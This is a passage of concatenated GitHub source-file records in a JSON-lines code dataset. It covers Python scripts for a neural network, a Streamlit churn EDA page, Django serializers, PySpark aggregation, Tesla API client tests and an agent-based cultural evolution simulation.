print(i0+il,llen)\n if line[i0+il]==' ':\n wraps += 1\n line = line[0:i0+il]+'\\n'+' '*indent+line[i0+il+1:] # Remove the space and add an indentation of spaces\n i0 = i0+il+indent\n il = wlen\n \n # print(wraps,wlen,llen,wraps*wlen,len(line),il,i0+il, line)\n if i0+il >= len(line): break\n dl = -1 # Search backward by default\n continue\n \n il += dl\n if i0+il > llen: break\n \n # print('i0,il,i0+il,dl:\" ', i0,il,i0+il,dl)\n if il==indent-1:\n i0 += wlen\n dl = +1 # Start searching forward\n continue\n \n return line\n","repo_name":"MarcvdSluys/sluyspy","sub_path":"sluyspy/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17775151782","text":"all_colors = [\n\t{\"label\": 'Red', \"sexy\": True},\n\t{\"label\": 'Pink', \"sexy\": False},\n\t{\"label\": 'Orange', \"sexy\": True},\n\t{\"label\": 'Brown', \"sexy\": False},\n\t{\"label\": 'Pink', \"sexy\": True},\n\t{\"label\": 'Violet', \"sexy\": True},\n\t{\"label\": 'Purple', \"sexy\": False},\n]\n\n#Your code go here:\ndef generate_li(item):\n return \"
  • \" + item[\"label\"] + \"
  • \"\n\ndef filter_colors(item):\n if item[\"sexy\"]:\n return item\n\nexpected = list(filter(filter_colors, all_colors))\nexpected_map = list(map(generate_li, expected))\n\nprint(expected_map)","repo_name":"sarasempere/ejerciciosPy_Loops","sub_path":"exercises/13.4-Making_HTML_with_filter_and_maP/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"556077195","text":"import numpy as np\nimport scipy.io as sc\nimport scipy.optimize as scop\nimport utils\nimport logistic_reg as lgr\n\ndef feed_forward(theta1, theta2, X):\n a1 = np.c_[np.ones(len(X)), X] #Size(5000 * 401)\n z2 = np.dot(theta1, a1.T) \n a2 = lgr.sigmoid(z2)\n a2 = np.c_[np.ones(len(a2[0])), a2.T] #Size(5000 * 26)\n z3 = np.dot(theta2, a2.T)\n a3 = lgr.sigmoid(z3) \n a3 = a3.T #Size(5000 * 1)\n return a3, a2, a1\n\ndef cost(theta1, theta2, X, y, lambda_):\n \"\"\"\n Compute cost for 2-layer neural network. \n\n Parameters\n ----------\n theta1 : array_like\n Weights for the first layer in the neural network.\n It has shape (2nd hidden layer size x input size + 1)\n\n theta2: array_like\n Weights for the second layer in the neural network. \n It has shape (output layer size x 2nd hidden layer size + 1)\n\n X : array_like\n The inputs having shape (number of examples x number of dimensions).\n\n y : array_like\n 1-hot encoding of labels for the input, having shape \n (number of examples x number of labels).\n\n lambda_ : float\n The regularization parameter. \n\n Returns\n -------\n J : float\n The computed value for the cost function. \n\n \"\"\"\n p, p2, p1 = feed_forward(theta1, theta2, X)\n m = len(X)\n\n cost = np.sum(y * np.log(p) + (1-y) * np.log(1 - p))\n rCost = np.sum(theta1[:, 1:]**2) + np.sum(theta2[:, 1:]**2)\n\n return -cost/m + ((lambda_/(2*m))*rCost)\n\n\n\ndef backprop(theta1, theta2, X, y, lambda_):\n \"\"\"\n Compute cost and gradient for 2-layer neural network. \n\n Parameters\n ----------\n theta1 : array_like\n Weights for the first layer in the neural network.\n It has shape (2nd hidden layer size x input size + 1)\n\n theta2: array_like\n Weights for the second layer in the neural network. \n It has shape (output layer size x 2nd hidden layer size + 1)\n\n X : array_like\n The inputs having shape (number of examples x number of dimensions).\n\n y : array_like\n 1-hot encoding of labels for the input, having shape \n (number of examples x number of labels).\n\n lambda_ : float\n The regularization parameter. \n\n Returns\n -------\n J : float\n The computed value for the cost function. \n\n grad1 : array_like\n Gradient of the cost function with respect to weights\n for the first layer in the neural network, theta1.\n It has shape (2nd hidden layer size x input size + 1)\n\n grad2 : array_like\n Gradient of the cost function with respect to weights\n for the second layer in the neural network, theta2.\n It has shape (output layer size x 2nd hidden layer size + 1)\n\n \"\"\"\n grad1 = np.zeros([len(theta1), len(theta1[0])])\n grad2 = np.zeros([len(theta2), len(theta2[0])])\n\n m = len(X)\n for i in range(m):\n a3, a2, a1 = feed_forward(theta1, theta2, [X[i]])\n\n sigma3 = a3 - y[i]\n gPrima = a2 * (1 - a2)\n sigma2 = np.dot(sigma3, theta2) * gPrima\n\n sigma = sigma2[:, 1:]\n\n grad1 += np.dot(sigma.T, a1)\n grad2 += np.dot(sigma3.T, a2)\n\n grad1[:,1:] += lambda_*theta1[:,1:]\n grad2[:,1:] += lambda_*theta2[:,1:]\n\n return (cost(theta1, theta2, X, y, lambda_), grad1/m, grad2/m)\n\ndef gradiant_descend(theta1, theta2, X, y, iter, alpha = 0, lambda_ = 0):\n for i in range (iter):\n c, th1, th2 = backprop(theta1, theta2, X, y, lambda_)\n theta1 -= alpha*th1\n theta2 -= alpha*th2\n print(i)\n\n return theta1, theta2\n\ndef backprop_aux(thetas, X, y, lambda_):\n th1 = np.reshape(thetas[:25 * (len(X[0]) + 1)], (25, len(X[0])+1))\n th2 = np.reshape(thetas[25 * (len(X[0]) + 1):], (len(y[0]), 26))\n c, g1, g2 = backprop(th1, th2, X, y, lambda_)\n return c, np.concatenate([np.ravel(g1), np.ravel(g2)])\n\ndef main():\n data = sc.loadmat('data/ex3data1.mat', squeeze_me=True)\n y = data['y']\n y_hot = np.zeros([len(y), 10])\n for i in range(len(y)):\n y_hot[i][y[i]] = 1\n X = data['X']\n\n # weights = sc.loadmat('data/ex3weights.mat')\n # theta1, theta2 = weights['Theta1'], weights['Theta2']\n # c = cost(theta1, theta2, X, y_hot, 1)\n # print(c)\n #utils.checkNNGradients(backprop, 1)\n\n theta1 = np.random.random((25, len(X[0]) + 1)) * (2*0.12) - 0.12\n theta2 = np.random.random((10, 26)) * (2*0.12) - 0.12\n\n theta1, theta2 = gradiant_descend(theta1, theta2, X, y_hot, 1000, 1, 1)\n\n cont =0\n for i in range(len(y)):\n if(yP[i] == y[i]):\n cont += 1\n print(\"Gradiant descent cost: \", cont / len(y) * 100, \"%\")\n\n theta1 = np.random.random((25, len(X[0]) + 1)) * (2*0.12) - 0.12\n theta2 = np.random.random((10, 26)) * (2*0.12) - 0.12\n\n arr = np.concatenate([theta1.ravel(), theta2.ravel()])\n result = scop.minimize(backprop_aux, arr, args=(X, y_hot, 1), method=\"TNC\", jac=True, options={'maxiter': 100})\n\n theta1 = np.reshape(result.x[:25 * (len(X[0]) + 1)], (25, len(X[0])+1))\n theta2 = np.reshape(result.x[25 * (len(X[0]) + 1):], (len(y_hot[0]), 26))\n\n yP = np.argmax(feed_forward(theta1, theta2, X)[0], 1) \n\n cont =0\n for i in range(len(y)):\n if(yP[i] == y[i]):\n cont += 1\n print(\"Scipy optimize cost: \", cont / len(y) * 100, \"%\")\n\nmain() ","repo_name":"oskar200130/AAlboroto","sub_path":"p5/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73028732533","text":"import numpy as np\nfrom matplotlib.mlab import bivariate_normal\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models import LogColorMapper, LogTicker, ColorBar\n\noutput_file('color_bar.html')\n\nN = 100\nX, Y = np.mgrid[-3:3:complex(0, N), -2:2:complex(0, N)]\nZ1 = bivariate_normal(X, Y, 0.1, 0.2, 1.0, 1.0) + \\\n 0.1 * bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)\nimage = Z1 * 1e6\n\ncolor_mapper = LogColorMapper(palette=\"Viridis256\", low=1, high=1e7)\n\nplot = figure(x_range=(0,1), y_range=(0,1), toolbar_location=None)\nplot.image(image=[image], color_mapper=color_mapper,\n dh=[1.0], dw=[1.0], x=[0], y=[0])\n\ncolor_bar = ColorBar(color_mapper=color_mapper, ticker=LogTicker(),\n label_standoff=12, border_line_color=None, location=(0,0))\n\nplot.add_layout(color_bar, 'right')\n\nshow(plot)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/bokeh_bokeh/bokeh-master/sphinx/source/docs/user_guide/examples/plotting_color_bars.py","file_name":"plotting_color_bars.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"13200419595","text":"import pytest\nfrom conftest import FULL_DATA, AsyncMock, MagicMock\nfrom tesla_api.exceptions import ApiError\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_get_vehicle(client, vehicle, mocker):\n mocker.patch.object(client, \"get_vehicle\", new=AsyncMock(return_value=vehicle))\n assert await client.get_vehicle(\"Lightning McQueen\") is vehicle\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_list_vehicles(client, vehicle, mocker):\n mocker.patch.object(client, \"list_vehicles\", new=AsyncMock(return_value=[vehicle]))\n assert len(await client.list_vehicles())\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_get(client, mocker, vehicle):\n ctx = MagicMock()\n resp = AsyncMock()\n\n ctx.__aenter__.return_value = resp\n ctx.__aexit__.return_value = resp\n err = AsyncMock(return_value={\"error\": \"ICE > EV\"})\n ok = AsyncMock(return_value={\"response\": FULL_DATA})\n resp.json = err\n\n mocker.patch.object(client, \"_get_headers\", return_value={\"hello\": \"you\"})\n mocker.patch.object(client, \"authenticate\", new=AsyncMock(return_value=None))\n mocker.patch.object(client._session, \"get\", return_value=ctx)\n\n with pytest.raises(ApiError):\n await client.get(\"vehicles\")\n\n resp.json = ok\n\n raw = await client.get(\"vehicles\")\n assert raw == FULL_DATA == vehicle._data\n\n\n@pytest.mark.asyncio\n@pytest.mark.skip()\nasync def test_TeslaApiClient_list_energy_sites(client, mocker, vehicle):\n data = await client.list_energy_sites()\n","repo_name":"Hellowlol/tesla_api","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1488431285","text":"import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom PIL import Image\n\nst.set_page_config(\n page_title = 'Customer Churn - EDA',\n initial_sidebar_state = 'expanded'\n)\n\ndef run() :\n \n # Membuat Title\n st.title('Customer Churn Prediction')\n\n # Membuat Sub Header\n st.subheader('EDA for Analysis of Customer Churn Dataset')\n\n # Menambahkan Gambar\n image = Image.open('churn.png')\n st.image(image, caption='Customer Churn')\n\n # Menambahkan Deskripsi\n st.write('Page Made by **Satriya Fauzan Adhim**')\n\n st.markdown('---')\n\n st.write('## Background')\n st.write('''Customer Churn on company across businesses always give negative impact \n to the company especially the profit loss. . Customer churn is a common \n challenge for many businesses across various industries, where customers \n stop using the company's products or services and switch to competitors..''')\n st.write('## Problem Statement')\n st.write('''The problem statement is to develop a predictive model using deep \n learning Artificial Neural Networks (ANN) to identify customers who \n are most likely to churn. The goal is to leverage available customer \n data, such as demographics, purchase history, customer interactions, \n and feedback, to build an accurate model that can predict churn behavior..''')\n \n # Membuat Garis Lurus\n st.markdown('---')\n\n # Magic Syntax\n '''\n The objective is to develop a robust and accurate churn prediction model \n that can be used to identify customers at risk of churn. This will enable \n the company to take proactive measures, such as targeted marketing campaigns, \n personalized offers, or improved customer service, to retain customers and \n reduce churn..\n\n By utilizing deep learning techniques, we aim to uncover intricate patterns \n and relationships in the data that traditional models may struggle to capture. \n The ANN model will be trained on historical customer data, where the churn \n status is known, to learn the underlying patterns and create a predictive model.\n\n '''\n\n # Show DataFrame\n data_url = 'https://raw.githubusercontent.com/kodokgodog/Latihan_hactiv8/main/churn.csv'\n data = pd.read_csv(data_url)\n st.dataframe(data)\n\n # Membuat Barplot\n st.write('#### Plot churn_risk_score')\n fig = plt.figure(figsize=(15, 5))\n sns.countplot(x='churn_risk_score', data=data)\n st.pyplot(fig)\n\n st.write(\n '''\n From the visualization above, we can see that the amount of customer that gonna churn \n is higher compared to not churn. Those numbers will have a significant negative impact \n on the company's business, with churn rate exceeding more than half of the total \n customers. Based on the data percentage, we can also observe that the data distribution \n appears to be balanced.\n ''')\n\n st.markdown('---')\n\n # Mengatur ukuran gambar\n fig, axes = plt.subplots(figsize=(20, 25))\n\n # Subplot 1\n axes = plt.subplot(4, 2, 1)\n plt.title('Variable gender')\n sns.countplot(x='gender', data=data)\n\n # Subplot 2\n axes = plt.subplot(4, 2, 2)\n plt.title('Variable region_category')\n sns.countplot(x='region_category', data=data)\n\n # Subplot 3\n axes = plt.subplot(4, 2, 3)\n plt.title('Variable membership_category')\n sns.countplot(x='membership_category', data=data)\n\n # Subplot 4\n axes = plt.subplot(4, 2, 4)\n plt.title('Variable joined_through_referral')\n sns.countplot(x='joined_through_referral', data=data)\n\n # Subplot 5\n axes = plt.subplot(4, 2, 5)\n plt.title('Variable preferred_offer_types')\n sns.countplot(x='preferred_offer_types', data=data)\n\n # Subplot 6\n axes = plt.subplot(4, 2, 6)\n plt.title('Variable internet_option')\n sns.countplot(x='internet_option', data=data)\n\n # Subplot 7\n axes = plt.subplot(4, 2, 7)\n plt.title('Variable used_special_discount')\n sns.countplot(x='used_special_discount', data=data)\n\n # Subplot 8\n axes = plt.subplot(4, 2, 8)\n plt.title('Variable offer_application_preference')\n sns.countplot(x='offer_application_preference', data=data)\n\n # Subplot 9\n axes = plt.subplot(4, 2, 8)\n plt.title('Variable past_complaint')\n sns.countplot(x='past_complaint', data=data)\n\n # Subplot 10\n axes = plt.subplot(4, 2, 8)\n plt.title('Variable complaint_status')\n sns.countplot(x='complaint_status', data=data)\n\n # Menampilkan visualisasi menggunakan Streamlit\n st.pyplot(fig)\n\n st.markdown('---')\n\n df=data\n\n # Mengatur ukuran gambar\n fig, axes = plt.subplots(figsize=(20, 25))\n\n # Subplot 1\n axes = plt.subplot(3, 2, 1)\n plt.title('Variable age')\n sns.countplot(x='age', data=df)\n\n # Subplot 2\n axes = plt.subplot(3, 2, 2)\n plt.title('Variable days_since_last_login')\n sns.countplot(x='days_since_last_login', data=df)\n\n # Subplot 3\n axes = plt.subplot(3, 2, 3)\n plt.title('Variable avg_time_spent')\n sns.countplot(x='avg_time_spent', data=df)\n\n # Subplot 4\n axes = plt.subplot(3, 2, 4)\n plt.title('Variable avg_transaction_value')\n sns.countplot(x='avg_transaction_value', data=df)\n\n # Subplot 5\n axes = plt.subplot(3, 2, 5)\n plt.title('Variable avg_frequency_login_days')\n sns.countplot(x='avg_frequency_login_days', data=df)\n \n # Subplot 6\n axes = plt.subplot(3, 2, 5)\n plt.title('Variable points_in_wallet')\n sns.countplot(x='points_in_wallet', data=df)\n\n # Menampilkan visualisasi menggunakan Streamlit\n st.pyplot(fig)\n\n st.write(\n '''\n Based on the visualization above, we can see that the majority of churned customers are \n either non-members or have low membership levels. Based on this data, a business strategy\n can be developed. For example, offering attractive promotions or offers specifically \n targeted at customers with low membership levels could be implemented. Additionally, \n providing promotions like offers for new members can also be effective.\n\n By targeting these specific segments, the business can aim to retain existing customers \n with low membership levels and attract new customers through enticing offers. It is \n important to create personalized and compelling incentives to encourage customer loyalty \n and minimize churn.\n\n it can be observed that the average transaction value for customers who are likely to \n churn is quite high. Therefore, if this issue is not addressed, the company will face a \n significant negative impact, particularly in terms of high profit loss.\n\n To mitigate this situation, the company could consider implementing retention \n strategies specifically targeting high-value customers. These strategies could include \n personalized offers, loyalty programs, or enhanced customer service tailored to their \n needs. By providing incentives and a positive customer experience, the company can \n encourage these customers to remain loyal and continue making high-value transactions.\n ''')\n\n st.markdown('---')\n\nif __name__== '__main__':\n run()","repo_name":"kodokgodog/Project","sub_path":"Customer Churn Prediction/deployment/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":7252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28472757225","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport shutil\nimport subprocess\nfrom time import *\n\ndef render(machine, parts = None):\n stl_dir = machine + os.sep + \"stls\"\n render_dir = machine + os.sep + \"render\"\n\n if os.path.isdir(render_dir):\n if not parts:\n shutil.rmtree(render_dir) #if doing them all clear the directory first\n sleep(0.1)\n os.makedirs(render_dir)\n else:\n os.makedirs(render_dir)\n\n #\n # List of individual part files\n #\n if parts:\n stls = [i[:-4] for i in parts]\n else:\n stls = [i[:-4] for i in os.listdir(stl_dir) if i[-4:] == \".stl\"]\n #\n # Add the multipart files\n #\n for i in os.listdir(stl_dir + os.sep + \"printed\"):\n if i[-4:] == \".stl\" and not i[:-4] in stls:\n stls.append(\"printed\" + os.sep + i[:-4])\n\n for i in stls:\n command = 'blender -b utils' + os.sep + 'render.blend -P utils' + os.sep + 'viz.py -- ' + \\\n stl_dir + os.sep + i + '.stl ' + render_dir + os.sep + i + '.png'\n print(command)\n subprocess.check_output(command.split())\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n render(sys.argv[1], sys.argv[2:])\n else:\n print(\"usage: render dibond|mendel|sturdy|huxley|your_machine, [part.stl ...]\")\n sys.exit(1)\n","repo_name":"nophead/Mendel90","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"21"} +{"seq_id":"38899824003","text":"from django.db import IntegrityError\nfrom rest_framework.exceptions import APIException, ValidationError\nfrom rest_framework.relations import StringRelatedField\nfrom rest_framework.serializers import ModelSerializer, CharField, IntegerField\n\nfrom assortment.models import Assortment\nfrom assortment.serializers import AssortmentSerializer\nfrom utils.response import get_error_message, C_API_EXCEPTION, C_PRICE_WRONG, C_QUANTITY_WRONG, C_USER_NOT_IN_COMPANY\nfrom .models import Product, ProductFeature, Feature, Category\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n model = Category\n fields = [\n 'id', 'name',\n ]\n\n\nclass FeatureSerializer(ModelSerializer):\n class Meta:\n model = Feature\n fields = [\n 'id', 'name',\n ]\n\n\nclass ProductFeatureSerializer(ModelSerializer):\n feature = CharField(source='feature.name')\n id = IntegerField(source='feature.id', required=False)\n\n class Meta:\n model = ProductFeature\n fields = [\n 'id', 'feature', 'value'\n ]\n\n\nclass ProductListSerializer(ModelSerializer):\n category = StringRelatedField()\n\n class Meta:\n model = Product\n fields = [\n 'id', 'name', 'category'\n ]\n\n\nclass ProductEntrySerializer(ModelSerializer):\n id = IntegerField(required=False)\n features = ProductFeatureSerializer(many=True, source='product_features')\n assortment = AssortmentSerializer(many=True, source='product_assortment', read_only=False)\n name = CharField(validators=[])\n\n class Meta:\n model = Product\n fields = [\n 'id', 'name', 'features', 'category', 'assortment',\n ]\n\n def validate_price(self, value):\n if self.context.get('action') == 'create' and int(value) == 0:\n raise ValidationError(get_error_message(C_PRICE_WRONG))\n return value\n\n def validate_quantity(self, value):\n if self.context.get('action') == 'create' and int(value) == 0:\n raise ValidationError(get_error_message(C_QUANTITY_WRONG))\n return value\n\n def validate(self, attrs):\n if not self.context.get('request').user.company:\n raise ValidationError(get_error_message(C_USER_NOT_IN_COMPANY))\n return attrs\n\n def create(self, validated_data):\n user = self.context.get('request').user\n\n features = validated_data.pop('product_features')\n assortment = validated_data.pop('product_assortment')\n assortment = assortment[0]\n\n try:\n product, _ = Product.objects.get_or_create(\n name=validated_data.get('name'),\n category=validated_data.get('category')\n )\n except IntegrityError:\n raise APIException(get_error_message(C_API_EXCEPTION))\n\n for item in features:\n try:\n feature, _ = Feature.objects.get_or_create(name=item.get('feature').get('name'))\n ProductFeature.objects.get_or_create(\n product=product,\n feature=feature,\n value=item.get('value')\n )\n except IntegrityError:\n raise APIException(get_error_message(C_API_EXCEPTION))\n\n Assortment.objects.get_or_create(\n company=user.company,\n product=product,\n price=assortment['price'],\n quantity=assortment['quantity'],\n available=assortment['available'],\n description=assortment['description'],\n )\n\n return product\n\n def update(self, instance, validated_data):\n user = self.context.get('request').user\n instance.name = validated_data.get('name')\n instance.category = validated_data.get('category')\n instance.save()\n features = validated_data.get('product_features')\n assortments = validated_data.get('product_assortment')\n assortments = assortments[0]\n for item in features:\n feature, _ = Feature.objects.get_or_create(name=item.get('feature').get('name'))\n try:\n product_feature = ProductFeature.objects.get(\n product=instance,\n feature=feature,\n )\n product_feature.value = item.get('value')\n product_feature.save()\n except ProductFeature.DoesNotExist:\n product_feature = ProductFeature.objects.create(\n product=instance,\n feature=feature,\n value=item.get('value'),\n )\n product_feature.save()\n try:\n assortment = Assortment.objects.get(\n company=user.company,\n product=instance\n )\n assortment.quantity = assortments.get('quantity')\n assortment.available = assortments.get('available')\n assortment.description = assortments.get('description')\n assortment.save()\n except Assortment.DoesNotExist:\n assortment = Assortment.objects.create(\n company=user.company,\n product=instance,\n quantity=assortments.get('quantity'),\n available=assortments.get('available'),\n description=assortments.get('description'),\n )\n assortment.save()\n\n return instance\n","repo_name":"Zippelin/DemoShop","sub_path":"docker/web/app/shop/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12253679475","text":"from ast import parse\nfrom pyspark import SparkContext, SparkConf\n\n\ndef parseLine(line):\n fields = line.split(',')\n userID = int(fields[0])\n cost = float(fields[2])\n return (userID, cost)\n\n\nif __name__ == \"__main__\":\n conf = SparkConf().setAppName(\"helloWorld\").setMaster(\"local\")\n sc = SparkContext(conf=conf)\n\n lines = sc.textFile(\"data/customer-orders.csv\")\n\n userCosts = lines.map(parseLine)\n\n totalSpentByCustomer = userCosts.reduceByKey(lambda x, y: x + y)\n\n flipped = totalSpentByCustomer.map(lambda x: (x[1], x[0]))\n sortedTotal = flipped.sortByKey()\n\n results = sortedTotal.collect()\n\n for total, userID in results:\n print(f'{userID} : {total:0.2f}$')","repo_name":"gf234/spark_practice","sub_path":"RDD/totalSpentByCustomer.py","file_name":"totalSpentByCustomer.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29155675602","text":"# Ingroup-Biased Copying Promotes Cultural Diversity and Complexity (https://tinyurl.com/ingroupdiversity)\r\n# Author: Marcel Montrey (marcel.montrey@mail.mcgill.ca)\r\n\r\nfrom multiprocessing import Pool, cpu_count # For running parallel simulations\r\nimport os # For creating directories\r\nimport random as rand # For randomization\r\nimport sys # For getting command line arguments\r\nimport networkx as nx # For generating graphs\r\nimport copy # For making deep copies of the parameters dictionary\r\nimport math # For the floor function\r\n\r\nimport agent # Class instantiating simulated agents\r\n\r\n# Set and iterate over simulation parameters\r\ndef main():\r\n\tparams = {\r\n\t\t# Strings\r\n\t\t'PATH': 'data',\r\n\t\t'NETWORK_TYPE': 'COMPLETE', # COMPLETE or RELAXED_CAVEMAN\r\n\t\t\r\n\t\t# Integers\r\n\t\t'N_RUNS': 20, # Number of simulations per parameter value\r\n\t\t'N_STEPS': 10000, # Maximum number of time steps\r\n\t\t'N_AGENTS': 400, # Number of agents\r\n\t\t'N_GROUPS': 20, # Number of groups\r\n\t\t\r\n\t\t# Floats\r\n\t\t'P_REWIRE': 0.2, # Probability of a within-group connection being rewired\r\n\t\t'P_BIAS': frange(0, 0.9, 0.1), # Ingroup copying bias strength\r\n\t\t'P_INNOVATE': 0.01, # Probability of innovation\r\n\t\t'P_COPY': [.1, .2], # Probability of copying\r\n\t\t'MU': 1.5, # How strongly innovation depends on cultural diversity\r\n\t\t'P_REPLACE': 0.001, # Replacement rate\r\n\t}\r\n\t\r\n\t# Parameters to iterate over\r\n\titr = [p for p in params if isinstance(params[p], list)]\r\n\t\r\n\t# If we're iterating over more than one parameter, iterate over the parameter with fewer settings first\r\n\tif len(itr) > 1 and len(params[itr[1]]) < len(params[itr[0]]):\r\n\t\titr[0], itr[1] = itr[1], itr[0]\r\n\t\r\n\t# Not iterating over any parameter\r\n\tif len(itr) == 0:\r\n\t\t# Run simulations in parallel\r\n\t\trun_parallel(params)\r\n\t\t\r\n\t# Iterating over at least one parameter\r\n\telse:\r\n\t\t# Iterate over the first parameter\r\n\t\tfor i in range(len(params[itr[0]])):\r\n\t\t\t# Set the first parameter\r\n\t\t\tcurrent = copy.deepcopy(params)\r\n\t\t\tcurrent[itr[0]] = params[itr[0]][i]\r\n\t\t\t\r\n\t\t\t# Print the current parameter\r\n\t\t\tprint('[{0}={1}]'.format(itr[0], current[itr[0]]))\r\n\t\t\t\r\n\t\t\t# Iterating over only one parameter\r\n\t\t\tif len(itr) == 1:\r\n\t\t\t\t# Set the current path\r\n\t\t\t\tcurrent['PATH'] = '{0}/{1}={2}'.format(params['PATH'], itr[0], current[itr[0]])\r\n\t\t\t\t\r\n\t\t\t\t# Run simulations in parallel\r\n\t\t\t\trun_parallel(current)\r\n\t\t\t\t\r\n\t\t\t# Iterating over two parameters\r\n\t\t\telif len(itr) == 2:\r\n\t\t\t\t# Iterate over the second parameter\r\n\t\t\t\tfor j in range(len(params[itr[1]])):\r\n\t\t\t\t\t# Set the second parameter\r\n\t\t\t\t\tcurrent[itr[1]] = params[itr[1]][j]\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Set the current path\r\n\t\t\t\t\tcurrent['PATH'] = '{0}/{1}={2}/{3}={4}'.format(params['PATH'], itr[0], current[itr[0]], itr[1], current[itr[1]])\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Print the current parameter\r\n\t\t\t\t\tprint(' [{0}={1}]'.format(itr[1], current[itr[1]]))\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Run simulations in parallel\r\n\t\t\t\t\trun_parallel(current)\r\n\r\n# Run multiple simulations in parallel\t\t\r\ndef run_parallel(params):\r\n\t# Set the number of threads to the cpu count (or override by passing the desired number of threads as a command line argument)\r\n\tpool = Pool(cpu_count() if len(sys.argv) == 1 else int(sys.argv[1]))\r\n\tpool.map(run, [params] * params['N_RUNS'])\r\n\tpool.close()\r\n\r\n# Run a simulation\r\ndef run(params):\r\n\t# Create agents\r\n\tagents = []\r\n\tfor i in range(params['N_AGENTS']):\r\n\t\tgroup = math.floor(i / params['N_AGENTS'] * params['N_GROUPS'])\r\n\t\tagents.append(agent.Agent(params, group))\r\n\t\r\n\t# Generate a complete graph\r\n\tif params['NETWORK_TYPE'] == 'COMPLETE':\r\n\t\tgraph = nx.complete_graph(params['N_AGENTS'])\r\n\t# Generate a relaxed caveman graph\r\n\telif params['NETWORK_TYPE'] == 'RELAXED_CAVEMAN':\r\n\t\tgraph = None\r\n\t\t# Repeat until the graph does not contain any isolated agents\r\n\t\twhile graph is None or nx.degree_histogram(graph)[0] > 0:\r\n\t\t\tgraph = nx.generators.relaxed_caveman_graph(params['N_GROUPS'], round(params['N_AGENTS'] / params['N_GROUPS']), params['P_REWIRE'])\r\n\t\r\n\t# Each individual's list of neighbors and the subset belonging to the ingroup\r\n\tneighbors = []\r\n\tneighbors_ig = []\r\n\tfor i in range(params['N_AGENTS']):\r\n\t\tneighbors.append(list(nx.neighbors(graph, i)))\r\n\t\tneighbors_ig.append([])\r\n\t\tfor j in neighbors[i]:\r\n\t\t\tif agents[i].group == agents[j].group:\r\n\t\t\t\tneighbors_ig[i].append(j)\r\n\t\r\n\t# Initialize data tracking\r\n\tdata = [[0 for j in range(2)] for i in range(params['N_STEPS'] + 1)] \r\n\tdata[0][0] = 'trait_types'\r\n\tdata[0][1] = 'trait_complexity'\r\n\r\n\t# Time step\r\n\tfor step in range(params['N_STEPS']):\r\n\t\t# Randomize interaction order\r\n\t\torder = list(range(len(agents)))\r\n\t\trand.shuffle(order)\r\n\t\t\r\n\t\t# Innovation phase\r\n\t\tfor i in order:\r\n\t\t\tagents[i].il(params)\r\n\t\t\r\n\t\t# Social learning phase\r\n\t\tfor i in order:\r\n\t\t\t# Apply the ingroup copying bias\r\n\t\t\tif rand.random() < params['P_BIAS'] and len(neighbors_ig[i]) > 0:\r\n\t\t\t\tj = rand.randint(0, len(neighbors_ig[i]) - 1)\r\n\t\t\t\tpartner = agents[neighbors_ig[i][j]]\r\n\t\t\t# Copy at random\r\n\t\t\telse:\r\n\t\t\t\tj = rand.randint(0, len(neighbors[i]) - 1)\r\n\t\t\t\tpartner = agents[neighbors[i][j]]\r\n\t\t\t\r\n\t\t\tagents[i].sl(params, partner)\r\n\t\t\r\n\t\t# Exhibition phase\r\n\t\tfor i in order:\r\n\t\t\tagents[i].exhibit()\r\n\t\t\r\n\t\t# Replacement phase\r\n\t\tfor i in order:\r\n\t\t\tif rand.random() < params['P_REPLACE']:\r\n\t\t\t\tagents[i] = agent.Agent(params, agent.Agent(params, agents[i].group))\r\n\t\t\r\n\t\t# Record data\r\n\t\tdata[step + 1][0] = sum([len(a.trait_types) for a in agents]) / params['N_AGENTS']\r\n\t\tdata[step + 1][1] = sum([max(a.trait_levels, default=0) for a in agents]) / params['N_AGENTS']\r\n\r\n\t# Make sure the directory path exists\r\n\tif not os.path.isdir(params['PATH']):\r\n\t\tos.makedirs(params['PATH'])\r\n\t\r\n\t# Save data to a new directory\r\n\tpath = create_dir(params)\r\n\twith open(path + '/results.csv', 'w') as file:\r\n\t\tfor i in range(step):\r\n\t\t\tfile.write(','.join(map(str, data[i])) + '\\n')\r\n\r\n# Create a list of evenly spaced parameter values\r\ndef frange(start, stop, step, digits=5):\r\n\treturn([round(start + step * i, digits) for i in range(round((stop - start) / step) + 1)])\r\n\r\n# Create a new numbered directory\r\ndef create_dir(params):\r\n\tdir = 0\r\n\twhile os.path.isdir('{0}/{1}'.format(params['PATH'], dir)):\r\n\t\tdir += 1\r\n\tpath = 